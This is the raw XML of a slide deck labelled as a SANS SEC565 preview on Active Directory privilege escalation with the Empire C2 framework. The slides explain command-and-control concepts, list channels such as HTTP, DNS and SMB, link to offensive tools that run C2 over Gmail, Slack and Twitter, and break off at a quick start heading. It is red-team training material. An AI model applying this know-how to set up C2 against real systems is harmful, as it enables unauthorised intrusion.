          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="44" orient="horz" pos="663" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="9FCC3B"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="45" orient="horz" pos="777" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="9FCC3B"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="48" orient="horz" pos="40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661846"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  <p:sldLayoutIdLst>
    <p:sldLayoutId id="2147484000"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80121-8845-8D25-D1CC-35B98E734DAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>© 2025 SANS Institute | All Rights Reserved</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DF52CA5-567A-50B0-9B7C-4DA034264EF2}"/>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AD privilege escalation workshop with Empire</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FFA9A74-0975-C053-36A6-5F704953ED35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A SEC565 Preview</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2436996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13F1-4AD9-BD3C-1206-CA9B1E27A8B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Command and Control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16" name="Group 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{113FD624-2BFD-C1AA-5F61-48E6822BB871}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="428624" y="2810238"/>
            <a:ext cx="11334750" cy="3390864"/>
            <a:chOff x="354330" y="2131814"/>
            <a:chExt cx="8417963" cy="2518288"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="10" name="Google Shape;103;p17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BB372B6-AED6-CA2F-3A3D-98DD2F545BBF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3">
              <a:alphaModFix/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4356243" y="2131814"/>
              <a:ext cx="4416050" cy="2515750"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="11" name="Picture 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6ED385C-471A-D3F4-C7C9-4DB24FD5B628}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="354330" y="2132275"/>
              <a:ext cx="3332767" cy="2517827"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Google Shape;106;p17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9E22F83-1F3B-D882-48D8-0A118FC5789D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1401096" y="2386013"/>
              <a:ext cx="5400325" cy="605589"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>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p17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{807B3316-C812-F5C1-7583-43F2C81CB8A8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1505706" y="2439295"/>
              <a:ext cx="1203325" cy="44436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Target</a:t>
              </a:r>
              <a:endParaRPr b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B11116"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Google Shape;108;p17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3D00A74-1A8D-6037-AA09-4497F4320D9A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4782123" y="2483164"/>
              <a:ext cx="1751692" cy="3566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B11116"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Roboto Mono"/>
                  <a:cs typeface="Roboto Mono"/>
                  <a:sym typeface="Roboto Mono"/>
                </a:rPr>
                <a:t>C2 Server</a:t>
              </a:r>
              <a:endParaRPr b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B11116"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Google Shape;109;p17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05FE19C1-947E-E44A-9FA0-BFCD3346E201}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3419377" y="2595052"/>
              <a:ext cx="1253156" cy="187509"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="B1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11116"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Content Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A288153-F484-9D0F-7CBF-05B8F41EC728}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428623" y="1286883"/>
            <a:ext cx="11334750" cy="1292662"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:sysClr val="window" lastClr="FFFFFF">
              <a:lumMod val="85000"/>
            </a:sysClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="182880" tIns="91440" rIns="182880" bIns="91440" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr sz="2000" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="342884" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr sz="1500" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="685766" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr sz="1400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1028649"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4pPr>
            <a:lvl5pPr marL="1371532" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr sz="1200" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="1714415"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29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18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064"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mn-lt"/>
              </a:rPr>
              <a:t>"Command and Control consists of techniques that adversaries may use to communicate with systems under their control within a victim network." </a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>- MITRE ATT&amp;CK®</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="151791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010F-E6BA-18A8-3561-BEB3B8ABACFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C2 infrastructure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78C4F478-4F50-44F9-B99D-011E25DC9DAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>The objective for this module is to understand:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>C2 Server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Listeners</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Communication Channels</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>HTTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>DNS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Command and Control Tiers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>C2 Client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Proxy Awareness</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Sleep</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Jitter</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="173523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65F4-B25B-3E76-B3B9-C23628418FC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Listeners</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E3AAE38-CDCB-02C6-3C7C-6C538F5212E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A command and control (C2) server is an attacker-controlled system that is used to communicate with implants</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C2 servers "listen," serve tasks, and retrieve the results from the registered implants</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A variety of methods to establish network communications or "channels"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C3, or custom command and control, is used to identify bespoke implementations with the intention of avoiding detection of widely distributed tools</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="48241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3F48-E416-32E4-3E69-054DA5D2A342}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Communication Channels</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BFC37D1-8B2B-FD66-79FC-EC557DA1A1C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The most popular C2 channels are:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP/S (network egress)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DNS (network egress)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>TCP (peer-to-peer)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SMB (peer-to-peer)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some more esoteric examples are:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Gmail: https://github.com/byt3bl33d3r/gcat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Google Drive: https://github.com/lukebaggett/google_socks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Slack: https://github.com/Coalfire-Research/Slackor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Twitter: https://github.com/PaulSec/twittor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DNS-over-HTTP: https://github.com/sensepost/godoh</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="276669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23E86-9B61-AC89-8216-754655083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6EBC0-AB28-8284-9D98-4DF3A221F4FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Empire</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B94167C2-181B-A7FD-3C86-983647B3BF91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Originally PowerShell Empire</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Used as a POC to convince Microsoft PowerShell was not secure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Eventually, the dark side won! And Microsoft improved PowerShell security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Got picked up by our good friends over at BC Security – Shoutout to them!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Rebranded to just Empire</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Multiple agents are developed, including exotic ones such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>IronPython</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Starkiller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> GUI </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Open Source! Free! Still actively maintained! Well adopted! </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2410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5999C-C312-444A-1A1B-6ADB82BE2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A405F-9C30-4271-B734-3024EAB217FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Empire</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2C35161-1F0C-B46C-EA70-21F186FB3577}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Empire quick start guide:</a:t>
            </a:r>
          </a:p>
          <a:p>
